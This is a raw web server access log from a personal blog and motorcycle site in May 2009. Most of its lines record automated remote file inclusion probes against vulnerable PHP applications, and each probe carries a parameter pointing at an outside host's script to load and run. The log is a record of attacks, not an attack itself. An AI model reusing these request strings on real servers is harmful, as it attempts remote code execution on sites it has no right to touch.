89.234.63.110 - - [22/May/2009:10:34:21 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:10:34:21 -0700] "GET /logs/access_080208.log//components/com_forum/download.php?phpbb_root_path=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:10:34:21 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:10:34:21 -0700] "GET /logs/access_080313.log//components/com_forum/download.php?phpbb_root_path=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:10:34:21 -0700] "GET /components/com_forum/download.php?phpbb_root_path=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:10:34:21 -0700] "GET /logs//components/com_forum/download.php?phpbb_root_path=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:10:34:21 -0700] "GET /logs/access_080208.log//components/com_forum/download.php?phpbb_root_path=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
89.234.63.110 - - [22/May/2009:10:34:21 -0700] "GET /logs/access_080313.log//components/com_forum/download.php?phpbb_root_path=http://www.gaylab.it/ray/copyright.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.90.91.245 - - [22/May/2009:10:34:30 -0700] "GET /logs/access_090321.log/canal.php?meio=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
209.90.91.245 - - [22/May/2009:10:34:30 -0700] "GET /canal.php?meio=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
209.90.91.245 - - [22/May/2009:10:34:30 -0700] "GET /logs/canal.php?meio=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
66.219.99.129 - - [22/May/2009:10:34:40 -0700] "GET /logs/access_090321.log/canal.php?meio=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
203.251.81.216 - - [22/May/2009:10:34:42 -0700] "GET /logs/access_080104.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.90.91.245 - - [22/May/2009:10:34:42 -0700] "GET /logs/access_081122.log/canal.php?meio=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
66.219.99.129 - - [22/May/2009:10:34:44 -0700] "GET /canal.php?meio=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.99.129 - - [22/May/2009:10:34:44 -0700] "GET /logs/canal.php?meio=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.99.129 - - [22/May/2009:10:34:50 -0700] "GET /logs/access_081122.log/canal.php?meio=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:35:11 -0700] "GET /logs/access_090206.log%20%20////skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:35:16 -0700] "GET /logs/access_090206.log%20%20////skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:35:32 -0700] "GET /logs/access_090117.log%20%20////skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
203.251.81.216 - - [22/May/2009:10:35:33 -0700] "GET /logs/access_080112.log%20%20//tools/send_reminders.php?noSet=0&includedir=http://www.petitbijouonline.com/debug/fatal1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:10:35:40 -0700] "GET /logs/access_081117.log%20%20/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:35:49 -0700] "GET /logs/access_090117.log%20%20////skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.93.147.154 - - [22/May/2009:10:36:02 -0700] "GET /logs/access_080313.log/ask_password.php?dir=http://h1.ripway.com/dinayu/id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:36:53 -0700] "GET /logs/access_081104.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:36:53 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
64.157.4.42 - - [22/May/2009:10:37:06 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
64.157.4.42 - - [22/May/2009:10:37:24 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
221.139.104.51 - - [22/May/2009:10:37:46 -0700] "GET /logs/access_090321.log%20%20//snippetmaster/includes/vars.inc.php?_SESSION[SCRIPT_PATH]=http://sez.by/assets/images/uslugi/office1.jpg??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:37:51 -0700] "GET /index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 200 42054 "-" "libwww-perl/5.805" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:10:38:03 -0700] "GET /logs/access_081104.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.200.8.89 - - [22/May/2009:10:38:10 -0700] "GET /logs/access_081117.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://125.163.251.219/har/fx29id1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:38:57 -0700] "GET /logs/access_081117.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://208.98.22.241/id.txt%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.805" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:39:44 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:39:44 -0700] "GET /logs/access_090318.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:39:46 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:39:46 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:39:46 -0700] "GET /logs/access_090318.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:39:47 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:39:52 -0700] "GET /logs/access_090117.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:39:53 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:39:53 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:39:53 -0700] "GET /logs/access_090318.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [22/May/2009:10:39:55 -0700] "GET /logs/access_080526.log%20%20//index2.php?option=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [22/May/2009:10:39:55 -0700] "GET /logs//index2.php?option=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [22/May/2009:10:39:55 -0700] "GET /index2.php?option=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.147.212.11 - - [22/May/2009:10:39:55 -0700] "GET /logs/access_081201.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:39:56 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:39:57 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:39:57 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:39:57 -0700] "GET /logs/access_090318.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:39:59 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:39:59 -0700] "GET /logs/access_090318.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:40:00 -0700] "GET /logs/access_090117.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.147.212.11 - - [22/May/2009:10:40:00 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:40:01 -0700] "GET /logs/access_090117.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:40:02 -0700] "GET /logs//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:40:02 -0700] "GET /skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:40:02 -0700] "GET /logs/access_090318.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:40:05 -0700] "GET /logs/access_090117.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:40:07 -0700] "GET /logs/access_090117.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.0" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:40:12 -0700] "GET /logs/access_090117.log//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [22/May/2009:10:40:25 -0700] "GET /logs/access_080526.log%20%20//index2.php?option=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [22/May/2009:10:40:25 -0700] "GET /logs//index2.php?option=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
123.143.98.5 - - [22/May/2009:10:40:28 -0700] "GET /index2.php?option=http://coxinha.ifrance.com/FX29ID.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.147.212.11 - - [22/May/2009:10:41:24 -0700] "GET /logs/access_081201.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.147.212.11 - - [22/May/2009:10:41:24 -0700] "GET /logs/access_090117.log//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "Mozilla/4.8 [en] (Windows NT 5.0; U)" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:41:28 -0700] "GET /logs/access.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
211.147.212.11 - - [22/May/2009:10:41:30 -0700] "GET /skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
211.147.212.11 - - [22/May/2009:10:41:38 -0700] "GET /logs//skin_shop/standard/3_plugin_twindow/twindow_notice.php?shop_this_skin_path=http://indoirc.go.ro/idB.txt?? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.77.136.123 - - [22/May/2009:10:42:02 -0700] "HEAD /bikes/occcb/eBayISAPI.dll.htm HTTP/1.0" 200 0 "-" "Mozilla/3.0 [en] (compatible; Win98; U)" "www.dmulk.com"
74.63.33.250 - - [22/May/2009:10:42:02 -0700] "GET /logs/access_090418.log//?_zb_path=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [22/May/2009:10:42:02 -0700] "GET /logs/access_071214.log//?_zb_path=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [22/May/2009:10:42:03 -0700] "GET /logs//?_zb_path=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 200 100625 "-" "Mozilla/5.0" "www.dmulk.com"
66.219.99.129 - - [22/May/2009:10:42:12 -0700] "GET /logs/access_090222.log/announcements.php?phpraid_dir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.99.129 - - [22/May/2009:10:42:12 -0700] "GET /announcements.php?phpraid_dir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.99.129 - - [22/May/2009:10:42:12 -0700] "GET /logs/announcements.php?phpraid_dir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
64.157.4.41 - - [22/May/2009:10:42:17 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
119.63.193.186 - - [22/May/2009:10:42:29 -0700] "GET /blog/wp-content/gallery/westoc-2008/picture-230.jpg HTTP/1.1" 200 536179 "-" "BaiduImagespider+(+http://www.baidu.jp/spider/)" "dmulk.com"
64.157.4.41 - - [22/May/2009:10:42:34 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
66.89.55.81 - - [22/May/2009:10:42:35 -0700] "GET /bikes/004.JPG HTTP/1.1" 200 2424832 "http://www.st-owners.com/forums/showthread.php?t=64573" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2)" "dmulk.com"
66.89.55.81 - - [22/May/2009:10:42:36 -0700] "GET /bikes/003.JPG HTTP/1.1" 200 2424832 "http://www.st-owners.com/forums/showthread.php?t=64573" "Mozilla/4.0 (compatible; MSIE 6.0; Windows NT 5.1; SV1; GTB6; .NET CLR 2.0.50727; .NET CLR 3.0.04506.30; InfoPath.2)" "dmulk.com"
66.219.99.129 - - [22/May/2009:10:42:37 -0700] "GET /logs/access_080722.log/announcements.php?phpraid_dir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
66.219.99.129 - - [22/May/2009:10:42:40 -0700] "GET /logs/access_080717.log/announcements.php?phpraid_dir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.79" "www.dmulk.com"
121.165.73.157 - - [22/May/2009:10:42:47 -0700] "GET /logs/access_090507.log///administrator/components/com_virtuemart/export.php?mosConfig_absolute_path=http://www.bungeholes.com/id1.txt? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
74.63.33.250 - - [22/May/2009:10:43:00 -0700] "GET /?_zb_path=http://bajingan2.fileave.com/id2.txt?? HTTP/1.1" 500 292 "-" "Mozilla/5.0" "www.dmulk.com"
209.90.91.245 - - [22/May/2009:10:43:03 -0700] "GET /logs/access_090222.log/announcements.php?phpraid_dir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
209.90.91.245 - - [22/May/2009:10:43:03 -0700] "GET /announcements.php?phpraid_dir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
209.90.91.245 - - [22/May/2009:10:43:03 -0700] "GET /logs/announcements.php?phpraid_dir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:10:43:16 -0700] "GET /bbs/skin/zero_vote/setup.php?dir=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:10:43:17 -0700] "GET /logs/access_090501.log%20%20//bbs/skin/zero_vote/setup.php?dir=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
65.23.158.226 - - [22/May/2009:10:43:17 -0700] "GET /logs//bbs/skin/zero_vote/setup.php?dir=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
209.90.91.245 - - [22/May/2009:10:43:18 -0700] "GET /logs/access_080722.log/announcements.php?phpraid_dir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
209.90.91.245 - - [22/May/2009:10:43:21 -0700] "GET /logs/access_080717.log/announcements.php?phpraid_dir=http://www.tactitrans.com/b1ttletX1.txt??? HTTP/1.1" 404 275 "-" "libwww-perl/5.822" "www.dmulk.com"
72.30.79.60 - - [22/May/2009:10:43:22 -0700] "GET /bikes/dteel/?M=A HTTP/1.0" 200 4953 "-" "Mozilla/5.0 (compatible; Yahoo! Slurp/3.0; http://help.yahoo.com/help/us/ysearch/slurp)" "www.dmulk.com"
140.128.99.10 - - [22/May/2009:10:43:41 -0700] "GET /logs/access_081104.log/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.whatsonsecunda.co.za/images/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
140.128.99.10 - - [22/May/2009:10:43:41 -0700] "GET /logs/index.php?option=com_virtuemart&page=shop.browse&category_id=&keyword=&manufacturer_id=&Itemid=&mosConfig_absolute_path=http://www.whatsonsecunda.co.za/images/id.txt?%0D?? HTTP/1.1" 404 275 "-" "libwww-perl/5.76" "www.dmulk.com"
64.157.4.41 - - [22/May/2009:10:43:43 -0700] "HEAD /blog/wp-cron.php?check=0e2d9f8f249ca15a02717d213606e9a2 HTTP/1.0" 200 0 "-" "WordPress/2.7.1" "dmulk.com"
65.23.158.226 - - [22/May/2009:10:43:53 -0700] "GET /logs/access_080211.log%20%20//bbs/skin/zero_vote/setup.php?dir=http://www.4-floor.com/css/z1??? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [22/May/2009:10:43:57 -0700] "GET /blog/wp-content/gallery/2009-04-18klr/20090418.gpx HTTP/1.0" 200 727834 "-" "-" "www.dmulk.com"
221.157.225.65 - - [22/May/2009:10:44:00 -0700] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [22/May/2009:10:44:00 -0700] "GET /logs/access_081003.log//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [22/May/2009:10:44:03 -0700] "GET /oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [22/May/2009:10:44:09 -0700] "GET /logs/access_081123.log//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
64.157.4.41 - - [22/May/2009:10:44:13 -0700] "GET /blog/wp-content/gallery/2009-04-12-crestlineadv/04122009bigbearDS.gpx HTTP/1.0" 200 1068632 "-" "-" "www.dmulk.com"
195.34.78.110 - - [22/May/2009:10:44:31 -0700] "GET /logs/access_090206.log%20%20//skin_shop/standard/2_view_body/body_default.php?GOODS[no]=deadbeef&GOODS[gs_input]=deadbeef&shop_this_skin_path=http://aene.de/eMCe/1.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [22/May/2009:10:44:35 -0700] "GET /oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [22/May/2009:10:44:35 -0700] "GET /logs/access_081003.log%20%20//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
221.157.225.65 - - [22/May/2009:10:44:35 -0700] "GET /logs//oneadmin/faqsupport/samplefaqsupport.php?path%5Bdocroot%5D=http://pallmall8.fileave.com/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [22/May/2009:10:44:37 -0700] "GET /logs/access_080906.log/?INCLUDE_FOLDER=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [22/May/2009:10:44:37 -0700] "GET /logs/?INCLUDE_FOLDER=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 200 100620 "-" "Mozilla/5.0" "www.dmulk.com"
200.32.100.130 - - [22/May/2009:10:44:37 -0700] "GET /logs/access_081210.log/?INCLUDE_FOLDER=http://www.triton-friendlyclub.com/2009/id.txt?? HTTP/1.1" 404 275 "-" "Mozilla/5.0" "www.dmulk.com"
